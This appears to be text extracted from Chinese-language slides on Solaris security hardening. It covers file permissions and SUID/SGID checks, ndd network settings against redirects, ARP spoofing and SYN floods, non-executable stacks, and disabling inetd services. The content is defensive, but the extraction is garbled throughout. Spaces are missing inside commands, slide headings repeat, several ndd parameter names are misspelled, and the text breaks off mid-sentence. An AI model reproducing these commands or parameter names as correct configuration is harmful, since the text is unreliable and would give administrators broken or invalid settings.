改變文檔或目錄之屬性。如#chmod755testChown改變文檔或目錄之擁有權(quán)#chownuser1file1;chown-Ruser1dir1Chgrp改變文檔或目錄之群組擁有權(quán)

#chgrp

group1

file1Solaris文件系統(tǒng)的安全SUID/SGIDSUID表示"設(shè)置用戶ID“;SGID表示"設(shè)置組ID"。當(dāng)用戶執(zhí)行一個SUID文件時，用戶ID在程序運(yùn)行過程中被置為文件擁有者的用戶ID。如果文件屬于root，那用戶就成為超級用戶。SUID程序代表了重要的安全漏洞，特別是SUID設(shè)為root的程序。Solaris文件系統(tǒng)的安全SUID/SGID

#find/-perm-4000-ls

find列出所有設(shè)置了SUID（“4000”）或SGID（“2000”）位的普通文件（“f”）。

chmoda-s<文件名>”移去相應(yīng)文件的“s”位。實驗6Solaris文件系統(tǒng)的安全設(shè)置系統(tǒng)的粘貼位

chmod1755files

ls–l/var/mail

drwxrwxrwt…….MailSolaris文件系統(tǒng)的安全限制/etc下文件的使用

find/etc/-typef–perm–g+w–print(查找組可寫文件）

find/etc/-typef–perm–o+w–print

（查找其他用戶可寫文件）

chmod–Rgo-w/etc

（改變?nèi)魏五e誤的組/其他用戶的寫權(quán)限）

Solaris文件系統(tǒng)的安全加密文件

cryptkey<clearfile>encryptedfilecryptkey<encryptedfile

Solaris文件系統(tǒng)安全備份命令cp—雖然常用來拷貝單獨(dú)一個文件，但cp（copy）命令支持一個遞歸選項（-R）來拷貝一個目錄和它里面所有的文件和子目錄。例如把mydir中所有內(nèi)容拷貝到mydir2中：cp-Rmydirmydir2。tar—tar（TApe

aRchiver）命令可以創(chuàng)建、把文件添加到或從一個tar檔案（或“tar文件”）中解開文件。cpio—這個SVR4和GNU工具把文件拷貝進(jìn)或拷貝出一個cpio或tar檔案。與tar相似。

練習(xí)找出系統(tǒng)中的setuid,setgid,sticky文件Solaris系統(tǒng)安全配置Solaris系統(tǒng)基本安裝配置帳號和口令安全文件系統(tǒng)安全其它安全配置網(wǎng)絡(luò)服務(wù)安全日常異常檢測和維護(hù)系統(tǒng)資源的監(jiān)控進(jìn)程內(nèi)存磁盤進(jìn)程結(jié)構(gòu)ProcessKernelthreadUserlwp查看進(jìn)程Ps–ef

Ps–ecl

進(jìn)程的優(yōu)先級別Real-timeSystemprocessesTimesharingprocessesInteractiveprocesses修改進(jìn)程的優(yōu)先級別Nice(nice+4or-10command)Priocntl

priocntl–e–cRT–t500–p20結(jié)束重啟進(jìn)程KillpidKill-9pidKill-HUPpid系統(tǒng)性能檢測Sac/usr/bin/sacSadc/usr/lib/sa/sadc系統(tǒng)性能檢測VmstatIostat–xtcDf

網(wǎng)絡(luò)性能監(jiān)測PingSpraySnoopNetstatnfsstat啟動網(wǎng)絡(luò)參數(shù)設(shè)定設(shè)置/etc/init.d/inetinit文件在系統(tǒng)作為路由器的情況中執(zhí)行

#ndd–set/dev/ip

ip_forwarding1關(guān)閉數(shù)據(jù)包轉(zhuǎn)發(fā)

#ndd–set/dev/ip

ip_forwarding0(或/etc/notrouter)忽略重定向數(shù)據(jù)包（否則有遭到DOS的隱患）

#ndd–set/dev/ip

ip_ignore_redirects1

不發(fā)送重定向數(shù)據(jù)包

#ndd–set/dev/ip

ip_send_redirects0禁止轉(zhuǎn)發(fā)定向廣播

#ndd–set/dev/ip

ip_forward_directed_broadcasts0禁止轉(zhuǎn)發(fā)在數(shù)據(jù)源設(shè)置了路由的數(shù)據(jù)包

#ndd–set/dev/ip

ip_forward_src_routed0啟動網(wǎng)絡(luò)參數(shù)設(shè)定ICMP協(xié)議參數(shù)設(shè)置/etc/init.d/inetinit文件關(guān)閉響應(yīng)echo廣播

＃ndd–set/dev/ip

ip_respond_to_echo_boadcast0關(guān)閉響應(yīng)時間戳廣播

#ndd–set/dev/ip

ip_respond_to_timestamp_broadcast0關(guān)閉地址掩碼廣播

#ndd–set/dev/ip

ip_respind_to_address_mask_broadcast0ARP攻擊防止減少過期時間#ndd–set/dev/arp

arp_cleanup_interval60000#ndd-set/dev/ip

ip_ire_flush_interval60000默認(rèn)是300000毫秒（5分鐘）加快過期時間，并不能避免攻擊，但是使得攻擊更加困難，帶來的影響是在網(wǎng)絡(luò)中會大量的出現(xiàn)ARP請求和回復(fù)請不要在繁忙的網(wǎng)絡(luò)上使用。ARP攻擊防止建立靜態(tài)ARP使用arp–ffilename加載如下文件

08:00:20:ba:a1:f2

08:00:20:ee:de:1f

這是一種很有效的方法，而且對系統(tǒng)影響不大。缺點是破壞了動態(tài)ARP協(xié)議禁止ARPifconfiginterface–arp

網(wǎng)卡不會發(fā)送ARP和接受ARP包。但是使用前提是使用靜態(tài)的ARP表，如果不在apr表中的計算機(jī)，將不能通信TCP協(xié)議參數(shù)Synflood（半開式連接攻擊）SYNFLOOD原理 請求方

服務(wù)方

>

發(fā)送

SYN消息

回應(yīng)

SYN-ACK

<

>

ACK

ndd–set/dev/tcptcp_conn_req_max_q04096默認(rèn)連接數(shù)為1024連接耗盡攻擊ndd–set/dev/tcp

tcp_conn_req_max_q1024默認(rèn)連接數(shù)為128防止TCP序列號預(yù)測攻擊(ip欺騙)建議在/etc/default/inetinit中增加如下的生成初始化序列號設(shè)置來防止TCP序列號預(yù)測攻擊(ip欺騙):TCP_STRONG_ISS=2

TCP協(xié)議參數(shù)堆棧緩沖區(qū)溢出禁止堆棧緩沖區(qū)溢出在/etc/system里加上如下語句，禁止緩沖溢出：

echo

"set

noexec_user_stack=1"

>>

/etc/system

echo

"set

noexec_user_stack_log=1"

>>

/etc/system

Solaris系統(tǒng)安全配置Solaris系統(tǒng)基本安裝配置帳號和口令安全文件系統(tǒng)安全其它安全配置網(wǎng)絡(luò)服務(wù)安全日常異常檢測和維護(hù)Solaris系統(tǒng)及網(wǎng)絡(luò)服務(wù)/etc/inet/inetd.conf/etc/inet/inetd.conf決定inetd啟動網(wǎng)絡(luò)服務(wù)時，啟動哪些服務(wù)，用什么命令啟動這些服務(wù)，以及這些服務(wù)的相關(guān)信息

/etc/service/etc/services文件記錄一些常用的接口及其所提供的服務(wù)的對應(yīng)關(guān)系。

/etc/protocols/etc/protocols文件記錄協(xié)議名及其端口的關(guān)系。/etc/Rc*.d/etc/inittab

inittab定義了系統(tǒng)缺省運(yùn)行級別，系統(tǒng)進(jìn)入新運(yùn)行級別需要做什么Inetd服務(wù)#more/etc/inetd.conf#systatstreamtcp

nowaitroot/usr/bin/ps

ps-ef#系統(tǒng)進(jìn)程監(jiān)控服務(wù)，允許遠(yuǎn)程察看進(jìn)程#netstatstreamtcp

nowaitroot/usr/bin/netstat

netstat-finet#網(wǎng)絡(luò)狀態(tài)監(jiān)控服務(wù)，允許遠(yuǎn)程察看網(wǎng)絡(luò)狀態(tài)#timestreamtcp6nowaitrootinternal#timedgramudp6waitrootinternal#網(wǎng)絡(luò)時間服務(wù)，允許遠(yuǎn)程察看系統(tǒng)時間#echostreamtcp6nowaitrootinternal#echodgramudp6waitrootinternal#網(wǎng)絡(luò)測試服務(wù)，回顯字符串Inetd服務(wù)#namedgram

udpwaitroot/usr/sbin/in.tnamed

in.tnamed#named，DNS服務(wù)器#telnetstreamtcp6nowaitroot/usr/sbin/in.telnetd

in.telnetd#telnet服務(wù)器#ftpstreamtcp6nowaitroot/usr/sbin/in.ftpd

in.ftpd-a#ftp服務(wù)器/etc/servicesMore/etc/services#Networkservices,Internetstyle#tcpmux1/tcpecho7/tcpecho7/udpdiscard9/tcpsinknulldiscard9/udpsinknullsystat11/tcpusersdaytime13/tcpdaytime13/udpnetstat15/tcpSolaris系統(tǒng)服務(wù)安全在inetd.conf中關(guān)閉不用的服務(wù)

#cp/etc/inet/inetd.conf/etc/inet/inetd.conf.bak然后用vi編輯器編輯inetd.conf文件，對于需要注釋掉的服務(wù)在相應(yīng)行開頭標(biāo)記“#”字符即可。注:Ftp和Telnet服務(wù)在不需要時也